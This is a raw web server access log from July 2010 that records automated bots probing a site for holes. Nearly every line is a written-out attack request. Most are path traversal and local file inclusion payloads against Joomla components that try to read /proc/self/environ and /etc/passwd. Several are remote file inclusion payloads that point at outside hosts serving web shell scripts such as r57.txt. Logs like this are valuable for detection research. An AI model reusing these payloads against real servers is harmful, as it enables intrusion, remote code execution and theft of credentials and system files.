216.227.214.212 - - [26/Jul/2010:00:08:22 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:08:22 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:08:29 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:10:46 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:10:47 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:10:47 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
188.72.70.56 - - [26/Jul/2010:00:24:19 +0200] "GET /logs//errors.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:00:24:19 +0200] "GET //errors.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:00:24:24 +0200] "GET //errors.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:00:24:24 +0200] "GET /logs//errors.php?dir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
216.227.214.212 - - [26/Jul/2010:00:29:29 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:29:30 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
216.227.214.212 - - [26/Jul/2010:00:29:30 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.79"
74.55.73.74 - - [26/Jul/2010:00:58:42 +0200] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:00:59:58 +0200] "GET /logs/access_log/index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:00:59:58 +0200] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:00:59:59 +0200] "GET /logs/index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:01:00:27 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:01:01:53 +0200] "GET /logs/access_log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:01:01:53 +0200] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:01:01:53 +0200] "GET /logs/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.120.237.175 - - [26/Jul/2010:01:12:31 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
174.120.237.175 - - [26/Jul/2010:01:12:31 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
174.120.237.175 - - [26/Jul/2010:01:12:31 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
178.162.133.106 - - [26/Jul/2010:01:12:52 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
178.162.133.106 - - [26/Jul/2010:01:12:52 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
178.162.133.106 - - [26/Jul/2010:01:12:52 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
202.160.123.72 - - [26/Jul/2010:01:19:44 +0200] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
202.160.123.72 - - [26/Jul/2010:01:19:44 +0200] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
202.160.123.72 - - [26/Jul/2010:01:19:44 +0200] "GET /logs/access_log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 354 "-" "Mozilla/5.0"
187.45.234.152 - - [26/Jul/2010:01:22:33 +0200] "GET //index.php?option=com_diary&controller=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:22:33 +0200] "GET /logs/access_log//index.php?option=com_diary&controller=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:22:33 +0200] "GET /logs//index.php?option=com_diary&controller=http://www.localroot.net/r57.txt????? HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
113.30.66.24 - - [26/Jul/2010:01:31:29 +0200] "GET //include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
113.30.66.24 - - [26/Jul/2010:01:31:34 +0200] "GET /logs//include/admin.lib.inc.php?site_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 318 "-" "Mozilla/5.0"
187.45.234.152 - - [26/Jul/2010:01:35:57 +0200] "GET /logs/access_log//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:35:57 +0200] "GET //index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:35:58 +0200] "GET /logs//index.php?option=com_aardvertiser&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
81.21.78.22 - - [26/Jul/2010:01:43:16 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
187.45.234.152 - - [26/Jul/2010:01:46:56 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:46:57 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
81.21.78.22 - - [26/Jul/2010:01:49:02 +0200] "GET /logs/access_log/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:01:49:02 +0200] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [26/Jul/2010:01:49:03 +0200] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
174.120.237.175 - - [26/Jul/2010:01:54:51 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:54:52 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
94.247.177.18 - - [26/Jul/2010:01:54:53 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
85.93.128.40 - - [26/Jul/2010:01:54:54 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
178.162.133.106 - - [26/Jul/2010:01:54:57 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:54:57 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
94.247.177.18 - - [26/Jul/2010:01:54:58 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:54:58 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
174.120.237.175 - - [26/Jul/2010:01:55:01 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
188.72.70.56 - - [26/Jul/2010:01:55:42 +0200] "GET //index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:42 +0200] "GET /logs/access_log%20%20//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:42 +0200] "GET /logs//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:46 +0200] "GET /logs/access_log%20%20//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:46 +0200] "GET /logs//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:55:46 +0200] "GET //index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
178.162.133.106 - - [26/Jul/2010:01:55:55 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
202.160.123.72 - - [26/Jul/2010:01:56:18 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:56:40 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:01:56:41 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
187.45.234.152 - - [26/Jul/2010:01:56:56 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:01:56:57 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.72.70.56 - - [26/Jul/2010:01:57:11 +0200] "GET /logs//components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:57:11 +0200] "GET //components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 328 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:57:11 +0200] "GET /logs/access_log//components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0"
94.247.177.18 - - [26/Jul/2010:01:58:08 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:58:08 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
94.247.177.18 - - [26/Jul/2010:01:58:08 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
188.72.70.56 - - [26/Jul/2010:01:58:12 +0200] "GET /logs/access_log%20%20//components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 346 "-" "Mozilla/5.0"
178.162.133.106 - - [26/Jul/2010:01:58:19 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:58:19 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.823"
178.162.133.106 - - [26/Jul/2010:01:58:20 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
85.93.128.40 - - [26/Jul/2010:01:58:25 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.813"
85.93.128.40 - - [26/Jul/2010:01:58:25 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.813"
85.93.128.40 - - [26/Jul/2010:01:58:26 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.813"
174.120.237.175 - - [26/Jul/2010:01:58:33 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:58:33 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:01:58:33 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
188.72.70.56 - - [26/Jul/2010:01:59:31 +0200] "GET /logs/access_log//components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 344 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:59:31 +0200] "GET /logs//components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:01:59:31 +0200] "GET //components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 328 "-" "Mozilla/5.0"
202.160.123.72 - - [26/Jul/2010:02:00:01 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:02:00:02 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
202.160.123.72 - - [26/Jul/2010:02:00:02 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
188.72.70.56 - - [26/Jul/2010:02:00:29 +0200] "GET /logs/access_log%20%20//components/com_mospray/scripts/admin.php?basedir=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 346 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:02:02:31 +0200] "GET //index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:02:02:31 +0200] "GET /logs/access_log%20%20//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:02:02:31 +0200] "GET /logs//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:02:02:35 +0200] "GET //index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:02:02:35 +0200] "GET /logs/access_log%20%20//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
188.72.70.56 - - [26/Jul/2010:02:02:35 +0200] "GET /logs//index.php?option=com_gcalendar&controller=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
216.14.114.38 - - [26/Jul/2010:02:03:18 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:03:32 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
174.120.237.175 - - [26/Jul/2010:02:06:11 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:02:06:11 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.831"
174.120.237.175 - - [26/Jul/2010:02:06:11 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.831"
187.45.234.152 - - [26/Jul/2010:02:07:16 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:07:17 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:07:17 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:07:24 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:07:24 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
187.45.234.152 - - [26/Jul/2010:02:07:24 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
216.14.114.38 - - [26/Jul/2010:02:22:58 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:22:58 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:22:58 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:22:58 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:22:58 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.834"
216.14.114.38 - - [26/Jul/2010:02:22:58 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.834"
201.12.141.11 - - [26/Jul/2010:02:41:56 +0200] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "-"
201.12.141.11 - - [26/Jul/2010:02:41:56 +0200] "GET /index.php?option=com_ccnewsletter&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 296 "-" "-"
174.121.93.221 - - [26/Jul/2010:02:42:31 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:42:42 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:02:46:14 +0200] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:02:48:41 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:02:58:52 +0200] "GET /?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 560 "-" "libwww-perl/5.805"
174.121.93.221 - - [26/Jul/2010:02:59:24 +0200] "GET /logs/access_log/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:59:25 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:59:25 +0200] "GET /logs/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:59:33 +0200] "GET /logs/access_log/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:59:33 +0200] "GET /*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.810"
174.121.93.221 - - [26/Jul/2010:02:59:33 +0200] "GET /logs/*.php?option=com_alphauserpoints&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
222.124.193.12 - - [26/Jul/2010:03:04:53 +0200] "GET /*.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
69.175.15.178 - - [26/Jul/2010:03:05:33 +0200] "GET ///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:05:33 +0200] "GET /logs/access_log///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 324 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:05:33 +0200] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:05:48 +0200] "GET /logs/error_log///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 323 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:06:43 +0200] "GET /logs/access_log///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 324 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:06:44 +0200] "GET ///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:06:44 +0200] "GET /logs///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 313 "-" "Mozilla/5.0"
69.175.15.178 - - [26/Jul/2010:03:07:01 +0200] "GET /logs/error_log///bbs//delete_all.php?board_skin_path=http://www.songdosarang.org/////skin/board/moviefl//head?? HTTP/1.1" 404 323 "-" "Mozilla/5.0"
222.124.193.12 - - [26/Jul/2010:03:25:59 +0200] "GET /logs/access_log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 308 "-" "libwww-perl/5.805"
222.124.193.12 - - [26/Jul/2010:03:26:00 +0200] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "libwww-perl/5.805"
